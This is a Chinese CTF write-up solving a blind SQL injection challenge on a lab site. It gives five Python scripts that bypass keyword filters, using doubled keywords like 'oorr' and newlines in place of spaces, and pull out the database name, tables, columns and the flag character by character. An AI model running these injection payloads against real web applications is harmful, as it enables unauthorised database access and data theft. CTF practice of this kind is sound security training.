CTF实验吧认真一点 SQL盲注

实验吧地址
http://ctf5.shiyanbar.com/web/earnest/index.php

很明显的返回两个不同得页面,判断为SQL盲注
并且 过滤了敏感字符
测试的时候还发现过滤了substr

尝试绕过，返回错误页面 说明 过滤是可以被绕过的

爆库名长度

import requests

str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
    key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    r = requests.post(url, data=key).text
    print(i)
    if str1 in r:
        print('the length of database is %s'%i)
        break

暴库、、

import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
database = ''
for i in range(1,19):
    for j in guess:
        key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            database += j
            print(j)
            break
print(database)

报表

import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
tables = ''
for i in range(1,12):
    for j in guess:        
        flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            tables += j
            print(j)
            break

print(tables)

列

import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
columns = ''
for i in range(1,6):
    for j in guess:        
        flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            columns += j
            print(j)
            break

print(columns)

flag脚本

import requests

guess = '~abcdefghijklmnopqrstuvwxyz_0123456789{}!@#$%^&*()-=+*'
data = ''
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,20):
    for j in guess:        
        flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            data += j
            print(j)
            break

print(data)

q
flag{haha~youwin!}
##很尴尬（把去掉才是便准答案正常应该是个空格没想到 空格这个字符）